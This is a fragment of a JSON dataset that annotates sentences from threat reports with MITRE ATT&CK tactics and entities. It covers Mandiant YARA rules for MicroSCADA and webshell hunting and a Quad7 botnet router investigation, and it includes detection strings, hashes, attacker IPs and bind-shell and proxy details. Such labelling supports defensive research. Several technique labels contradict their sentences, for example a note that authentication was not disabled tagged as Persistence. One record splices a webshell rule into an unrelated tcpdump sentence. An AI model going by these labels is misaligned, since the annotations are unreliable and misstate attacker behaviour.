"Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s104-441c2d", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 104, "context_before": "strings:\n$s1 = \"scilc.exe\" ascii wide $s2 = \"Scilc.exe\" ascii wide $s3 = \"SCILC.exe\" ascii wide $s4 = \"SCILC.EXE\" ascii wide condition:\nfilesize < 1MB and any of them } rule M_Hunting_MicroSCADA_SCILC_Program_Execution_Strings { meta:", "sentence_text": "author = \"Mandiant\" date = \"2023-02-13\" description = \"Searching for files containing strings associated with execution of the MicroSCADA Supervisory Control Implementation Language (SCIL) scilc.exe binary.\"", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Detects SCILC.exe execution through string pattern matching", "entities": [ { "text": "MicroSCADA Supervisory Control Implementation Language (SCIL)", "start": 127, "end": 188, "label": "Infrastructure_Indicator" }, { "text": "scilc.exe binary.", "start": 189, "end": 206, "label": "Infrastructure_Indicator" }, { "text": "execution of the MicroSCADA Supervisory Control Implementation Language (SCIL) scilc.exe binary.", "start": 110, "end": 206, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s105-c79779", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 105, "context_before": "author = \"Mandiant\" date = \"2023-02-13\" description = \"Searching for files containing strings associated with execution of the MicroSCADA Supervisory Control Implementation Language (SCIL) scilc.exe binary.\"", "sentence_text": "disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s106-a85b10", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 106, "context_before": "disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "sentence_text": "strings:\n$s = \"scilc.exe -do\" nocase ascii wide condition:\nfilesize < 1MB and all of them } rule M_Methodology_MicroSCADA_Path_Strings { meta:", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "Detects scilc.exe -do command execution patterns", "entities": [ { "text": "scilc.exe -do", "start": 15, "end": 28, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s107-b19095", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 107, "context_before": "strings:\n$s = \"scilc.exe -do\" nocase ascii wide condition:\nfilesize < 1MB and all of them } rule M_Methodology_MicroSCADA_Path_Strings { meta:", "sentence_text": "author = \"Mandiant\" date = \"2023-02-27\" description = \"Searching for files containing references to MicroSCADA filesystem path containing native MicroSCADA binaries and resources.\"", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1083", "name": "File and Directory Discovery" } ], "procedure": "Hunts for MicroSCADA filesystem path references in binaries", "entities": [ { "text": "MicroSCADA filesystem path", "start": 100, "end": 126, "label": "Infrastructure_Indicator" }, { "text": "native MicroSCADA binaries and resources.\"", "start": 138, "end": 180, "label": "Infrastructure_Indicator" }, { "text": "Searching for files containing references ", "start": 55, "end": 97, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s108-244ec1", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 108, "context_before": "author = \"Mandiant\" date = \"2023-02-27\" description = \"Searching for files containing references to MicroSCADA filesystem path containing native MicroSCADA binaries and resources.\"", "sentence_text": "disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s109-c422e7", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 109, "context_before": "disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "sentence_text": "strings:\n$s1 = \"sc\\\\prog\\\\exec\" nocase ascii wide condition:\nfilesize < 1MB and $s1 } rule M_Hunting_VBS_Batch_Launcher_Strings { meta:\nauthor = \"Mandiant\" date = \"2023-02-13\" description = \"Searching for VBS files used to launch a batch script.\"", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "Detects VBS files launching batch scripts via specific path patterns", "entities": [ { "text": "sc\\\\prog\\\\exec", "start": 16, "end": 30, "label": "Infrastructure_Indicator" }, { "text": "VBS files", "start": 205, "end": 214, "label": "Infrastructure_Indicator" }, { "text": "launch a batch script.\"", "start": 223, "end": 246, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s110-4a8cdd", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 110, "context_before": "strings:\n$s1 = \"sc\\\\prog\\\\exec\" nocase ascii wide condition:\nfilesize < 1MB and $s1 } rule M_Hunting_VBS_Batch_Launcher_Strings { meta:\nauthor = \"Mandiant\" date = \"2023-02-13\" description = \"Searching for VBS files used to launch a batch script.\"", "sentence_text": "disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s111-eecfa0", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 111, "context_before": "disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "sentence_text": "strings:\n$s1 = \"CreateObject(\\\"WScript.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.007", "name": "JavaScript" } ], "procedure": "Detects WScript object creation in VBS scripts", "entities": [ { "text": "\"CreateObject(\\\"WScript", "start": 15, "end": 38, "label": "Action" }, { "text": "WScript", "start": 31, "end": 38, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s112-ee9c81", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 112, "context_before": "strings:\n$s1 = \"CreateObject(\\\"WScript.", "sentence_text": "Shell\\\")\" ascii $s2 = \"WshShell.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.007", "name": "JavaScript" } ], "procedure": "Detects WScript Shell object creation in scripts", "entities": [ { "text": "Shell", "start": 0, "end": 5, "label": "Infrastructure_Indicator" }, { "text": "WshShell", "start": 23, "end": 31, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s113-24efd8", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 113, "context_before": "Shell\\\")\" ascii $s2 = \"WshShell.", "sentence_text": "Run chr(34) &\" ascii $s3 = \"& Chr(34), 0\" ascii $s4 = \"Set WshShell = Nothing\" ascii $s5 = \".bat\" ascii condition:\nfilesize < 400 and all of them } rule M_Hunting_APT_Webshell_PHP_NEOREGEORG { meta:\nauthor = \"Mandiant\" description = \"Searching for REGEORG webshells.\"", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Detects VBS script patterns for batch file execution and REGEORG webshells", "entities": [ { "text": "& Chr(34), 0", "start": 28, "end": 40, "label": "Infrastructure_Indicator" }, { "text": "Set WshShell = Nothing", "start": 55, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "\".bat\"", "start": 91, "end": 97, "label": "Infrastructure_Indicator" }, { "text": "REGEORG webshells", "start": 248, "end": 265, "label": "MalwareTool" } ] }, { "uid": "mitre-97_mitre_report-p1-s114-a11ddd", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 114, "context_before": "Run chr(34) &\" ascii $s3 = \"& Chr(34), 0\" ascii $s4 = \"Set WshShell = Nothing\" ascii $s5 = \".bat\" ascii condition:\nfilesize < 400 and all of them } rule M_Hunting_APT_Webshell_PHP_NEOREGEORG { meta:\nauthor = \"Mandiant\" description = \"Searching for REGEORG webshells.\"", "sentence_text": "disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s115-c7b550", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 115, "context_before": "disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "sentence_text": "strings:\n$php = \"> /home/tap/tcpdump.log 2>&1 To prevent the SD card in our tap from running out of space, and since we were uncertain about the network flows passing through the socks proxy implemented by the Quad7 operators, we decided to create a rotation of the pcaps with a maximum of 10Gb of captured network flow for each reboot of the tap.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s72-e35509", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 72, "context_before": "-C 1000 -W 10’ >> /home/tap/tcpdump.log 2>&1 To prevent the SD card in our tap from running out of space, and since we were uncertain about the network flows passing through the socks proxy implemented by the Quad7 operators, we decided to create a rotation of the pcaps with a maximum of 10Gb of captured network flow for each reboot of the tap.", "sentence_text": "The second technical issue was related to the UART itself .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s73-25cf31", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 73, "context_before": "The second technical issue was related to the UART itself .", "sentence_text": "From an attacker’s perspective, It is straightforward to disable the user authentication from UART after having compromised the router simply by deleting or rewriting one specific file inside the /tmp/ directory.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "Disables UART authentication by modifying files in /tmp directory", "entities": [ { "text": "disable the user authentication from UART", "start": 57, "end": 98, "label": "Action" }, { "text": "deleting or rewriting one specific file", "start": 145, "end": 184, "label": "Action" }, { "text": "/tmp/ directory.", "start": 196, "end": 212, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-98_mitre_report-p1-s74-e561f1", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 74, "context_before": "From an attacker’s perspective, It is straightforward to disable the user authentication from UART after having compromised the router simply by deleting or rewriting one specific file inside the /tmp/ directory.", "sentence_text": "To address that issue, we decided to have a backup plan prior to our intervention.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s75-5edd25", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 75, "context_before": "To address that issue, we decided to have a backup plan prior to our intervention.", "sentence_text": "We developed our own remote forensics-friendly reverse shell specifically for the Archer C7 .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s76-9b13b7", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 76, "context_before": "We developed our own remote forensics-friendly reverse shell specifically for the Archer C7 .", "sentence_text": "The idea behind this was simple: since we knew that the threat actor re-compromises the router following a reboot, we could pre-implant it to get his malware .", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1040", "name": "Network Sniffing" } ], "procedure": "Pre-implants router to capture malware after threat actor re-compromise", "entities": [ { "text": " threat actor", "start": 55, "end": 68, "label": "ThreatActor" }, { "text": "re-compromises the router following a reboot,", "start": 69, "end": 114, "label": "Action" }, { "text": "pre-implant it to get his malware .", "start": 124, "end": 159, "label": "Action" } ] }, { "uid": "mitre-98_mitre_report-p1-s77-eee497", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 77, "context_before": "The idea behind this was simple: since we knew that the threat actor re-compromises the router following a reboot, we could pre-implant it to get his malware .", "sentence_text": "The critical aspect was to open and connect to the UART without unplugging the router or causing connection loss, as this could result in the loss of the malware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s78-b9b15c", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 78, "context_before": "The critical aspect was to open and connect to the UART without unplugging the router or causing connection loss, as this could result in the loss of the malware.", "sentence_text": "We extensively tested this configuration using a PCBite , even on hot plates with a similar width to a server cabinet (24 inches) as our contact informed us that the router was located in “a small server cabinet”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s79-cb2daa", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 79, "context_before": "We extensively tested this configuration using a PCBite , even on hot plates with a similar width to a server cabinet (24 inches) as our contact informed us that the router was located in “a small server cabinet”.", "sentence_text": "Upon arriving at the office where the router was hosted, we faced our first challenge: we encountered a very small switch cabinet with limited space to manoeuvre the router.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s80-a90464", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 80, "context_before": "Upon arriving at the office where the router was hosted, we faced our first challenge: we encountered a very small switch cabinet with limited space to manoeuvre the router.", "sentence_text": "Consequently the operation to remove the Phillips screws, open the router and connect probes to the UART was quite intricate.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s81-732d22", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 81, "context_before": "Consequently the operation to remove the Phillips screws, open the router and connect probes to the UART was quite intricate.", "sentence_text": "Fortunately, the attacker had not disabled the user authentication.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Maintains UART user authentication access on compromised router", "entities": [ { "text": "attacker had not disabled the user authentication.", "start": 17, "end": 67, "label": "Action" } ] }, { "uid": "mitre-98_mitre_report-p1-s82-5757fb", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 82, "context_before": "Fortunately, the attacker had not disabled the user authentication.", "sentence_text": "Prior to the intervention we took several snapshots of the list of running processes and writable directories of a clean router .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s83-e87d36", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 83, "context_before": "Prior to the intervention we took several snapshots of the list of running processes and writable directories of a clean router .", "sentence_text": "Hence a simple diffing between the compromised router and clean snapshots revealed the difference immediately.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s84-5a66e3", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 84, "context_before": "Hence a simple diffing between the compromised router and clean snapshots revealed the difference immediately.", "sentence_text": "The attacker did not try to conceal itself by modifying files or process names.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Does not conceal malicious files or process names", "entities": [ { "text": "The attacker", "start": 0, "end": 12, "label": "ThreatActor" }, { "text": "did not try to conceal itself ", "start": 13, "end": 43, "label": "Action" }, { "text": "modifying files or process names.", "start": 46, "end": 79, "label": "Action" } ] }, { "uid": "mitre-98_mitre_report-p1-s85-a4e043", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 85, "context_before": "The attacker did not try to conceal itself by modifying files or process names.", "sentence_text": "As we wanted to ensure the integrity of the transferred files and as the Busybox installed on the Archer C7 lacked a reliable utility for this purpose, we uploaded our implant onto the router.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s86-860214", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 86, "context_before": "As we wanted to ensure the integrity of the transferred files and as the Busybox installed on the Archer C7 lacked a reliable utility for this purpose, we uploaded our implant onto the router.", "sentence_text": "This approach provided us with a convenient method to download and verify the integrity of the downloaded files directly.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s87-5d917b", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 87, "context_before": "This approach provided us with a convenient method to download and verify the integrity of the downloaded files directly.", "sentence_text": "We successfully obtained the binaries that our attacker pushed onto the compromised router.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Deploys binaries onto compromised router infrastructure", "entities": [ { "text": "obtained the binaries", "start": 16, "end": 37, "label": "Action" }, { "text": " attacker pushed onto the compromised router.", "start": 46, "end": 91, "label": "Action" }, { "text": "attacker", "start": 47, "end": 55, "label": "ThreatActor" } ] }, { "uid": "mitre-98_mitre_report-p1-s88-b6f48d", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 88, "context_before": "We successfully obtained the binaries that our attacker pushed onto the compromised router.", "sentence_text": "These binaries consisted of a Telnet binary coming from BusyBox ( 386bf8259668c0abb6c72fdcae904164 ) which is listening on the TCP/7777 and redirected incoming connections to a simple authenticated shell named xlogin ( 69ced04a2ec895084d3aab1086216d32 ).", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Deploys modified Telnet binary and xlogin shell on port 7777", "entities": [ { "text": "Telnet binary", "start": 30, "end": 43, "label": "Infrastructure_Indicator" }, { "text": "BusyBox ", "start": 56, "end": 64, "label": "Infrastructure_Indicator" }, { "text": "TCP/7777", "start": 127, "end": 135, "label": "Infrastructure_Indicator" }, { "text": "386bf8259668c0abb6c72fdcae904164", "start": 66, "end": 98, "label": "Infrastructure_Indicator" }, { "text": " 69ced04a2ec895084d3aab1086216d32", "start": 218, "end": 251, "label": "Infrastructure_Indicator" }, { "text": "xlogin", "start": 210, "end": 216, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-98_mitre_report-p1-s89-d56d31", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 89, "context_before": "These binaries consisted of a Telnet binary coming from BusyBox ( 386bf8259668c0abb6c72fdcae904164 ) which is listening on the TCP/7777 and redirected incoming connections to a simple authenticated shell named xlogin ( 69ced04a2ec895084d3aab1086216d32 ).", "sentence_text": "Additionally, there was a Socks5 proxy ( 29e6df5bb30ed8fd12c09d9b6890ab4f ) derived from the bhhbazinga’s Sock5 open source project which listened on the SOCKS/11288 used to relay brute force attacks to Microsoft 365 API endpoints.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Deploys Socks5 proxy on port 11288 for relaying brute force attacks", "entities": [ { "text": "Socks5 proxy", "start": 26, "end": 38, "label": "Infrastructure_Indicator" }, { "text": "29e6df5bb30ed8fd12c09d9b6890ab4f ", "start": 41, "end": 74, "label": "Infrastructure_Indicator" }, { "text": "SOCKS/11288", "start": 154, "end": 165, "label": "Infrastructure_Indicator" }, { "text": "Microsoft 365 API endpoints.", "start": 203, "end": 231, "label": "Infrastructure_Indicator" }, { "text": "used to relay brute force attacks", "start": 166, "end": 199, "label": "Action" } ] }, { "uid": "mitre-98_mitre_report-p1-s90-844a66", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 90, "context_before": "Additionally, there was a Socks5 proxy ( 29e6df5bb30ed8fd12c09d9b6890ab4f ) derived from the bhhbazinga’s Sock5 open source project which listened on the SOCKS/11288 used to relay brute force attacks to Microsoft 365 API endpoints.", "sentence_text": "Despite our expectations, there was nothing else – no sophisticated goodies for our reverser after all.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s91-7d38ba", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 91, "context_before": "Despite our expectations, there was nothing else – no sophisticated goodies for our reverser after all.", "sentence_text": "However,\nbinaries alone do not provide much insight without some network context around them .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s92-a65726", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 92, "context_before": "However,\nbinaries alone do not provide much insight without some network context around them .", "sentence_text": "In the next section we present our investigation based on the network capture collected by our network tap to determine if we found valuable data inside.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s93-238400", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 93, "context_before": "In the next section we present our investigation based on the network capture collected by our network tap to determine if we found valuable data inside.", "sentence_text": "Digging into the network capture.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s94-e3778d", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 94, "context_before": "Digging into the network capture.", "sentence_text": "Sadly, the router did not reboot during this period and was replaced shortly after our operation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s95-a95a27", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 95, "context_before": "Sadly, the router did not reboot during this period and was replaced shortly after our operation.", "sentence_text": "As a result, we did not capture any exploits used by the operators to re-compromise it.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s96-72ba98", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 96, "context_before": "As a result, we did not capture any exploits used by the operators to re-compromise it.", "sentence_text": "Nevertheless, we found answers to some of our questions by analysing our small network capture (11MB) obtained from connections to the ports TELNET/7777 and SOCKS/11288.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s97-249a88", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 97, "context_before": "Nevertheless, we found answers to some of our questions by analysing our small network capture (11MB) obtained from connections to the ports TELNET/7777 and SOCKS/11288.", "sentence_text": "Here is a summary of what we have seen:\nOur first question was whether this botnet is used solely by the Quad7 operators to brute force Microsoft 365 user accounts or other services.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s98-a8c157", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 98, "context_before": "Here is a summary of what we have seen:\nOur first question was whether this botnet is used solely by the Quad7 operators to brute force Microsoft 365 user accounts or other services.", "sentence_text": "Our network capture revealed that 912 connections were made using the socks proxy during one week to login.microsoftonline.com .", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1110.003", "name": "Password Spraying" } ], "procedure": "Establishes 912 connections to login.microsoftonline.com via SOCKS proxy", "entities": [ { "text": "912 connections were made", "start": 34, "end": 59, "label": "Action" }, { "text": " login.microsoftonline.com .", "start": 100, "end": 128, "label": "Infrastructure_Indicator" }, { "text": "socks proxy", "start": 70, "end": 81, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-98_mitre_report-p1-s99-bb0a15", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 99, "context_before": "Our network capture revealed that 912 connections were made using the socks proxy during one week to login.microsoftonline.com .", "sentence_text": "Therefore, we believe this botnet is primarily used to conduct simple password spraying attacks, rather than engaging in traditional brute force attacks We identified two servers ( 142.11.205[.]164 and 23.254.201[.]175 ) both hosted under HOSTWINDS, US (AS54290), that authenticated themselves to the socks proxy to send requests to login.microsoftonline.com To check the proxy status, two IP addresses were employed ( 151.236.20[.]185 and 151.236.20[.]211 ), this time hosted under M247, RO (AS9009).", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "Operates password spraying infrastructure via HOSTWINDS and M247 hosting providers", "entities": [ { "text": "password spraying attacks,", "start": 70, "end": 96, "label": "Action" }, { "text": "142.11.205[.]164", "start": 181, "end": 197, "label": "Infrastructure_Indicator" }, { "text": "23.254.201[.]175 ", "start": 202, "end": 219, "label": "Infrastructure_Indicator" }, { "text": "151.236.20[.]185", "start": 419, "end": 435, "label": "Infrastructure_Indicator" }, { "text": "151.236.20[.]211", "start": 440, "end": 456, "label": "Infrastructure_Indicator" }, { "text": " M247, RO (AS9009).", "start": 482, "end": 501, "label": "Infrastructure_Indicator" }, { "text": " HOSTWINDS, US (AS54290)", "start": 238, "end": 262, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-98_mitre_report-p1-s100-14f2a3", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 100, "context_before": "Therefore, we believe this botnet is primarily used to conduct simple password spraying attacks, rather than engaging in traditional brute force attacks We identified two servers ( 142.11.205[.]164 and 23.254.201[.]175 ) both hosted under HOSTWINDS, US (AS54290), that authenticated themselves to the socks proxy to send requests to login.microsoftonline.com To check the proxy status, two IP addresses were employed ( 151.236.20[.]185 and 151.236.20[.]211 ), this time hosted under M247, RO (AS9009).", "sentence_text": "These IP addresses used the socks proxy to only check the exit node IP address by issuing HTTP requests to whatismyip.akamai.com with Go and Python user agents.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Verifies proxy exit nodes via whatismyip.akamai.com with Go and Python user agents", "entities": [ { "text": "socks proxy", "start": 28, "end": 39, "label": "Infrastructure_Indicator" }, { "text": "whatismyip.akamai.com", "start": 107, "end": 128, "label": "Infrastructure_Indicator" }, { "text": "Go and Python user agents.", "start": 134, "end": 160, "label": "Infrastructure_Indicator" }, { "text": "check the exit node IP address", "start": 48, "end": 78, "label": "Action" } ] }, { "uid": "mitre-98_mitre_report-p1-s101-c2e49d", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 101, "context_before": "These IP addresses used the socks proxy to only check the exit node IP address by issuing HTTP requests to whatismyip.akamai.com with Go and Python user agents.", "sentence_text": "This initial analysis led us to believe that only one threat actor was using the socks proxy installed on the router to check Microsoft 365 user accounts .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s102-d52af8", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 102, "context_before": "This initial analysis led us to believe that only one threat actor was using the socks proxy installed on the router to check Microsoft 365 user accounts .", "sentence_text": "This finding was surprising, given that socks remain an unsecure proxying protocol with an authentication in clear-text.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s103-150403", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 103, "context_before": "This finding was surprising, given that socks remain an unsecure proxying protocol with an authentication in clear-text.", "sentence_text": "Our second question was related to the xlogin bind shell and who was interacting with it.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s104-4bdaf5", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 104, "context_before": "Our second question was related to the xlogin bind shell and who was interacting with it.", "sentence_text": "And at one time, we saw the same IP address issuing hands-on keyboard commands via the xlogin bind shell to update the socks5 binary on the compromised router.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Updates socks5 binary via hands-on-keyboard commands through xlogin bind shell", "entities": [ { "text": "issuing hands-on keyboard commands", "start": 44, "end": 78, "label": "Action" }, { "text": "update the socks5 binary", "start": 108, "end": 132, "label": "Action" }, { "text": "xlogin bind shell ", "start": 87, "end": 105, "label": "Infrastructure_Indicator" }, { "text": "compromised router.", "start": 140, "end": 159, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-98_mitre_report-p1-s105-b550b0", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 105, "context_before": "And at one time, we saw the same IP address issuing hands-on keyboard commands via the xlogin bind shell to update the socks5 binary on the compromised router.", "sentence_text": "Let’s take a look at the brute force attempts in our telemetry.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s106-8faf65", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 106, "context_before": "Let’s take a look at the brute force attempts in our telemetry.", "sentence_text": "The rate of attempts per account is on average about one every 40 hours, and it is common for accounts to have received more than 50 authentication attempts over several months .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s107-1045c9", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 107, "context_before": "The rate of attempts per account is on average about one every 40 hours, and it is common for accounts to have received more than 50 authentication attempts over several months .", "sentence_text": "This suggests that a list of passwords is being tested on each account (password spraying), rather than credential pairs obtained from data breaches (credential stuffing).", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1110.003", "name": "Password Spraying" } ], "procedure": "Conducts password spraying attacks using password lists rather than credential stuffing", "entities": [ { "text": " list of passwords is being tested on each account", "start": 20, "end": 70, "label": "Action" }, { "text": "password spraying", "start": 72, "end": 89, "label": "Action" }, { "text": "credential stuffing", "start": 150, "end": 169, "label": "Action" } ] }, { 